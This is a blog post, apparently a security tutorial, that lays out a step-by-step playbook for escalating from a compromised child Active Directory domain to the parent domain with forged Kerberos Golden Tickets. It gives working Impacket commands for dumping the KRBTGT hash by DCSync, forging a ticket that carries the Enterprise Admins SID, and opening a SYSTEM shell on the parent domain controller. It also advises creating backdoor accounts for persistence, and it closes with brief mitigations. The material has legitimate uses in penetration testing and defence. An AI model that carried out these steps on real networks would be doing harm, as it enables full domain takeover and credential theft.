Child-Parent AD Exploitation via Golden Tickets

This playbook provides a detailed, step-by-step guide to escalating privileges from a compromised child domain to a parent domain in an Active Directory (AD) environment. Each step includes explanations, tool usage, and notes to improve comprehension and enhance understanding.

Overview

Active Directory (AD) environments often have trust relationships between domains. A child-to-parent domain trust allows users in the child domain to access resources in the parent domain. Attackers can exploit these trust relationships to escalate privileges and compromise the parent domain. This playbook focuses on leveraging Kerberos ticket forgery (Golden Ticket attacks) to achieve this.

Step 1: Information Gathering

To perform the attack, you need specific information about the child and parent domains. This data is essential for crafting a Golden Ticket.

What to Collect

  1. KRBTGT hash: The NTLM hash of the KRBTGT account in the child domain.
  2. Child Domain SID: The Security Identifier (SID) of the child domain.
  3. Target User Name: A username in the child domain (can be non-existent).
  4. Child Domain FQDN: Fully Qualified Domain Name of the child domain.
  5. Parent Domain Enterprise Admin SID: The SID of the Enterprise Admins group in the parent domain.

Tool 1: secretsdump.py (Impacket)

  • Purpose: Perform a DCSync attack to retrieve the KRBTGT hash from the child domain.
  • Command:
secretsdump.py <CHILD_DOMAIN>/<ADMIN_USER>@<CHILD_DC_IP>
  • Explanation:
    • This tool simulates a Domain Controller (DC) replication request using the DRSUAPI protocol.
    • It extracts sensitive information, including NTLM hashes for user accounts.
  • Output Example:

krbtgt:502:aad3b435b51404eeadeadbeef51404ee:9d765b482771505deadbeef065964d5f

Tool 2: lookupsid.py (Impacket)

  • Purpose: Enumerate SIDs for users, groups, and domains by brute-forcing them.
  • Command:
lookupsid.py <CHILD_DOMAIN>/<USER>@<CHILD_DC_IP>
  • Explanation:
    • This tool queries the Local Security Authority (LSA) service on a DC to enumerate SIDs.
    • The output includes the domain SID and RID mappings for users/groups.
  • Output Example:

Domain SID is: S-1-5-21-2deadbeef9-209893948-9deadbeef

Notes:

  • The KRBTGT hash is critical for forging Kerberos tickets.
  • The Enterprise Admin SID is needed to escalate privileges into the parent domain.

Step 2: Constructing a Golden Ticket

A Golden Ticket is a forged Kerberos ticket that allows you to impersonate any user in a domain. In this attack, you will forge a ticket with elevated privileges in both domains.

Tool: ticketer.py (Impacket)

  • Purpose: Generate a Golden Ticket using the collected information.
  • Command:
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <CHILD_DOMAIN_SID> \-domain<CHILD_DOMAIN_FQDN> -extra-sid <ENTERPRISE_ADMIN_SID> \-spn krbtgt/<PARENT_DOMAIN_FQDN> <FAKE_USERNAME>
  • Explanation:
    • -nthash: Specifies the NTLM hash of the KRBTGT account.
    • -domain-sid: Adds the SID of the child domain.
    • -extra-sid: Adds the SID of the parent domain’s Enterprise Admins group.
    • -spn: Service Principal Name for Kerberos authentication in the parent domain.
    • <FAKE_USERNAME>: A placeholder username (e.g., “hacker”).
  • Output:
    • A .ccache file containing your forged Kerberos ticket.

Notes:

  • The extra SID allows you to escalate privileges into the parent domain by impersonating an Enterprise Admin.

Step 3: Using the Golden Ticket

Once you have created your Golden Ticket, you can use it to authenticate against resources in both domains.

Steps:

  1. Set up your environment to use the forged Kerberos ticket:
export KRB5CCNAME=<TICKET_FILENAME>.ccache

This tells your system to use this ticket for Kerberos authentication.

  1. Authenticate to a parent domain controller using Impacket’s psexec.py:
psexec.py <CHILD_DOMAIN_FQDN>/<FAKE_USERNAME>@<PARENT_DC_HOSTNAME> -k -no-pass

If successful, this provides a SYSTEM-level shell on the parent DC.

Notes:

  • Ensure that your .ccache file is correctly generated otherwise, authentication will fail.
  • Use tools like klist to verify that your Kerberos ticket is loaded correctly.

Step 4: Automating with raiseChild.py

For an automated approach, Impacket’s raiseChild.py simplifies many steps by combining enumeration, ticket creation, and exploitation into one process.

Command Example:

raiseChild.py -target-exec <PARENT_DC_IP> <CHILD_DOMAIN_FQDN>/<ADMIN_USER>:<PASSWORD>

Workflow of raiseChild.py:

  1. Enumerates child and parent domains’ FQDNs.
  2. Retrieves SIDs for both domains.
  3. Extracts KRBTGT credentials from the child domain.
  4. Creates a Golden Ticket with elevated privileges for both domains.
  5. Authenticates into the parent DC using PsExec.

Notes:

  • While convenient, automated tools like raiseChild.py may fail or cause unintended side effects in production environments. Always understand and validate each step manually before relying on automation.

Post-Attack Activities

Once access to the parent domain is achieved:

  1. Use tools like BloodHound or PowerView to enumerate sensitive resources and identify additional attack paths.
  2. Establish persistence by creating backdoor accounts or modifying group memberships.
  3. Perform lateral movement across critical systems using tools like PsExec or RDP.

Mitigation Strategies

To prevent such attacks:

  1. Regularly rotate KRBTGT account passwords using Microsoft’s recommended two-step process.
  2. Enable SID filtering on inter-domain trusts to block unauthorised SID usage.
  3. Monitor for unusual Kerberos activity, such as long-lived tickets or excessive TGS requests.
  4. Implement Privileged Access Management (PAM) solutions to restrict administrative access.
  5. Deploy advanced detection tools like Microsoft Defender for Identity or SIEM solutions.

Additional Resources

  1. Active Directory Exploitation Cheat Sheet
  2. The Hacker Recipes – Trusts
  3. ADSecurity Blog – Kerberos Golden Tickets
  4. MITRE ATT&CK Framework – Domain Trust Discovery

Final Notes

Understanding each step of this process is critical for both offensive security professionals and defenders. While tools like raiseChild.py provide automation, performing these steps manually ensures better understanding and troubleshooting capabilities during engagements or real-world scenarios.

For more insightful and engaging write-ups, visit kosokoking.com and stay ahead in the world of cybersecurity!

Leave a Reply

Your email address will not be published. Required fields are marked *

RELATED

Cross-Forest Trust Abuse: Kerberos Attack Guide

Learn how attackers exploit cross-forest trusts in Active Directory using Kerberoasting, password reuse, and SID history abuse. Defend your network…

More

Understanding ExtraSIDs Attack in Cybersecurity

Discover the mechanics and implications of the ExtraSIDs Attack, a cybersecurity threat exploiting Windows SIDs. Learn detection and defence strategies.

More

ExtraSids Attacks: SID History Exploitation

Discover how ExtraSids attacks exploit SID history to compromise parent domains and bypass security with detection and mitigation strategies.

More

CrackMapExec: Cybersecurity Tool Insights

Explore CrackMapExec, a powerful cybersecurity tool for post-exploitation. Learn its uses, ethical dilemmas, and defence strategies in this comprehensive guide.

More